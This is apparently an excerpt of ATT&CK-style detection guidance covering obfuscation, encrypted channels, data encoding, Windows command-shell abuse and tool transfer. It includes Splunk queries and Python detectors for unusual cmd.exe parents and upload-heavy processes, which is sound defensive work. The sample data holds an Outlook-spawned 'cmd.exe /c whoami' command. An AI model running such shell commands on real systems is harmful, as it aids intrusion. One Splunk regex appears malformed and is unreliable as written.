- Monitor executed commands and arguments for indicators of obfuscation and potentially suspicious syntax such as uninterpreted escape characters (e.g., ^). Also monitor command lines for syntax-specific signs of obfuscation, such as variations of arguments associated with encoding.
- Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).
- Monitor for contextual data about a file, which may include information such as name, the content (e.g., signature, headers, or data/media), user/owner, permissions, etc. File-based signatures may be capable of detecting code obfuscation depending on the methods used.[185][186][187]
- Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.[186]
- Monitor and analyze calls to functions such as GetProcAddress() that are associated with malicious code obfuscation.[185]
- Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
- Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^). Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.
- Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads.
- Monitor for the creation of WMI objects and values that may highlight storage of malicious data such as commands or payloads.
T1573 - Encrypted Channel
Detects:
- Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
T1132 - Data Encoding
Detects:
- Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.
  Note: Network analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols and packet contents.
T1059.003 - Windows Command Shell
Detects:
- Monitor executed commands and arguments that may abuse the Windows command shell for execution. Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
  Analytic 1 - Look for unusual command shell execution
  sourcetype=WinEventLog:Security
  | search (EventCode=4688 OR EventCode=4689) process_name="cmd.exe"
  | eval suspicious_cmd=if(like(command_line, "%/c%") OR like(command_line, "%.bat%") OR like(command_line, "%.cmd%"), "Yes", "No")
  | where suspicious_cmd="Yes"
- Monitor for newly executed processes that may abuse the Windows command shell for execution.
  Note: Try an analytic by creating a baseline of parent processes of cmd seen over the last 30 days and a list of parent processes of cmd seen today. Parent processes in the baseline are removed from the set of parent processes seen today, leaving a list of new parent processes. This analytic attempts to identify suspicious programs spawning cmd by looking for programs that do not normally create cmd. It is very common for some programs to spawn cmd as a subprocess, for example to run batch files or Windows commands. However, many processes don’t routinely launch a command prompt, e.g., Microsoft Outlook. A command prompt being launched from a process that normally doesn’t launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one.
  Analytic 1 - Unusual Command Execution
  (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") AND CommandLine="cmd.exe" AND (CommandLine REGEXP "./c." OR CommandLine REGEXP ".._ \/k.*")
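The note above describes a baseline-versus-today set difference over the parent processes of cmd.exe. The Python below is an added example (not from the campaign page or any product) that implements exactly that over constructed Sysmon Event ID 1 records: collect the parent image names that spawned cmd.exe in the 30 days before the day under review, collect those seen on that day, and report the difference together with the command lines involved. Timestamps, paths and the Outlook case are assumptions made for the example; it also shows the cold-start edge case, where an empty baseline makes every parent look new.

```python
from datetime import datetime, timedelta

# Constructed Sysmon Event ID 1 records (UtcTime as Sysmon formats it); not real telemetry.
SAMPLE_EVENTS = [
    # Inside the 30-day baseline window before 2024-03-31.
    {"UtcTime": "2024-03-02 08:15:00", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"},
    {"UtcTime": "2024-03-10 03:00:00", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "cmd.exe /c C:\\Scripts\\backup.bat"},
    {"UtcTime": "2024-03-20 14:20:00", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Python311\\python.exe", "CommandLine": "cmd.exe /c dir"},
    # The day under review.
    {"UtcTime": "2024-03-31 09:01:00", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"},
    {"UtcTime": "2024-03-31 09:02:30", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "CommandLine": "cmd.exe /c whoami"},
    {"UtcTime": "2024-03-31 09:03:00", "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
    # Older than the baseline window: must not count as known.
    {"UtcTime": "2024-01-15 10:00:00", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "cmd.exe /c echo hi"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def cmd_events(events, start, end):
    """cmd.exe process-creation events with start <= UtcTime < end."""
    return [ev for ev in events
            if basename(ev["Image"]) == "cmd.exe" and start <= parse_ts(ev["UtcTime"]) < end]


def new_cmd_parents(events, day, baseline_days=30):
    """Parents of cmd.exe seen on `day` (YYYY-MM-DD) but not in the preceding baseline window.

    Returns {parent_basename: [command lines seen today]}."""
    day_start = datetime.strptime(day, "%Y-%m-%d")
    day_end = day_start + timedelta(days=1)
    baseline = {basename(ev["ParentImage"])
                for ev in cmd_events(events, day_start - timedelta(days=baseline_days), day_start)}
    new_parents = {}
    for ev in cmd_events(events, day_start, day_end):
        parent = basename(ev["ParentImage"])
        if parent not in baseline:
            new_parents.setdefault(parent, []).append(ev["CommandLine"])
    return new_parents


if __name__ == "__main__":
    for parent, cmdlines in new_cmd_parents(SAMPLE_EVENTS, "2024-03-31").items():
        print(parent, cmdlines)
```

On 2024-03-31 only OUTLOOK.EXE is new relative to the March baseline, matching the note's Outlook example. Run against 2024-03-02 instead, the baseline is empty and explorer.exe itself is reported, which is why such an analytic needs the baseline populated before its output is trusted.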
T1105 - Ingress Tool Transfer
Detects:
- Monitor executed commands and arguments for suspicious activity associated with downloading external content.
- Monitor for file creation and files transferred into the network.
- Monitor for newly constructed network connections that are sent or received by untrusted hosts or that create files on the system; either may be suspicious. Abnormal use of utilities such as FTP may also be suspicious.
- Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domains and IPs.
- Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
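The "uncommon data flows" item appears under both T1132 (Data Encoding) and T1105 (Ingress Tool Transfer) above, with two concrete tests: a client sending far more than it receives, and a process talking to the network that has never been seen doing so. The Python below is an added example, not from the campaign page or any product, that applies both tests to constructed per-process flow records and a constructed per-host baseline. The record layout is hypothetical: it assumes a host sensor that reports bytes in each direction per connection along with the owning process, which Sysmon Event ID 3 on its own does not provide.

```python
from collections import defaultdict

# Constructed per-connection records (hypothetical schema; not real telemetry).
SAMPLE_FLOWS = [
    {"host": "WS07", "process": "chrome.exe",   "dest": "203.0.113.20:443",  "bytes_out": 40_000,     "bytes_in": 9_500_000},
    {"host": "WS07", "process": "outlook.exe",  "dest": "203.0.113.30:443",  "bytes_out": 300_000,    "bytes_in": 2_100_000},
    {"host": "WS07", "process": "wmiprvse.exe", "dest": "198.51.100.9:443",  "bytes_out": 52_000_000, "bytes_in": 61_000},
    {"host": "WS07", "process": "notepad.exe",  "dest": "198.51.100.9:8080", "bytes_out": 1_200,      "bytes_in": 900},
    {"host": "FS01", "process": "chrome.exe",   "dest": "203.0.113.20:443",  "bytes_out": 12_000,     "bytes_in": 700_000},
]

# Constructed baseline: processes previously observed making network connections, per host.
BASELINE = {
    "WS07": {"chrome.exe", "outlook.exe", "teams.exe"},
    "FS01": {"chrome.exe", "svchost.exe"},
}


def aggregate(flows):
    """Total bytes in each direction and the set of destinations per (host, process)."""
    totals = defaultdict(lambda: {"bytes_out": 0, "bytes_in": 0, "dests": set()})
    for f in flows:
        t = totals[(f["host"], f["process"].lower())]
        t["bytes_out"] += f["bytes_out"]
        t["bytes_in"] += f["bytes_in"]
        t["dests"].add(f["dest"])
    return totals


def uncommon_flows(flows, baseline, ratio_threshold=10.0, min_bytes_out=1_000_000):
    """Flag processes never seen on the network before, and upload-heavy processes.

    A flow is upload-heavy when bytes_out is at least `min_bytes_out` and exceeds
    bytes_in by `ratio_threshold` or more; the byte floor keeps tiny flows quiet."""
    findings = []
    for (host, proc), t in aggregate(flows).items():
        reasons = []
        if proc not in baseline.get(host, set()):
            reasons.append("new_network_process")
        ratio = t["bytes_out"] / max(t["bytes_in"], 1)  # avoid division by zero
        if t["bytes_out"] >= min_bytes_out and ratio >= ratio_threshold:
            reasons.append("upload_heavy")
        if reasons:
            findings.append({"host": host, "process": proc, "reasons": reasons,
                             "bytes_out": t["bytes_out"], "bytes_in": t["bytes_in"],
                             "dests": sorted(t["dests"])})
    return sorted(findings, key=lambda x: (x["host"], x["process"]))


if __name__ == "__main__":
    for finding in uncommon_flows(SAMPLE_FLOWS, BASELINE):
        print(finding)
```

Two processes are reported for WS07: notepad.exe only because it is new on the network, and wmiprvse.exe for both reasons, since it is absent from the baseline and pushed roughly 850 times more data than it received. The browser on FS01 is large in volume but download-dominated and already baselined, so it stays quiet.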